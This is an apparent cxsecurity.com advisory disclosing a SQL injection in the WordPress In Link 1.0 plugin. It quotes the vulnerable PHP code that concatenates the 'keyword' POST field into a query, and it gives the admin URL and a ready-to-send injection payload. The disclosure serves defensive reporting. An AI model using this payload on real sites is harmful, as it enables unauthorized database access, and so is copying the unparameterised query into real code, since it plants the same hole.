WordPress In Link 1.0 SQL Injection

2017.11.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Vulnerability Type: SQL injection is POST parameter "keyword" Affected plugin: --------------------------------------- In Link Version: 1.0 Requires WordPress Version: 2.8 or higher Compatible up to: 2.8 URL: https://wordpress.org/plugins/inlinks/ (plugin has been closed after the report) --------------------------------------- Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim($_POST['keyword']); 59 $URL = trim($_POST['url']); 60 $Rel = trim($_POST['rel']); 61 $Target = trim($_POST['target']); 62 $table_name = $wpdb->prefix ."URLKeywordsMapping"; 63 $SelectKeywordURLMappingDetails = "select * from $table_name where FldKeyword LIKE '".$Keyword."'" ; 64 65 $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails); 66 67 if(count($KeywordURLMappingDetails)) 68 { 69 $Message = "<div align='center' style=\"color:red; font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in the table.</div>"; 70 } More issues seems to exist in the plugin, because of lack of input validation and the lack of use of prepared statements. Affected URL: /wp-admin/options-general.php?page=inlinks%2Finlinks.php POST Parameters (with payload): keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add Tested against: * In Link 1.0 * WordPress 4.9 * mysql Ver 14.14 Distrib 5.7.20, for Linux (x86_64) using EditLine wrapper * PHP 7.0.22-0ubuntu0.16.04.1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top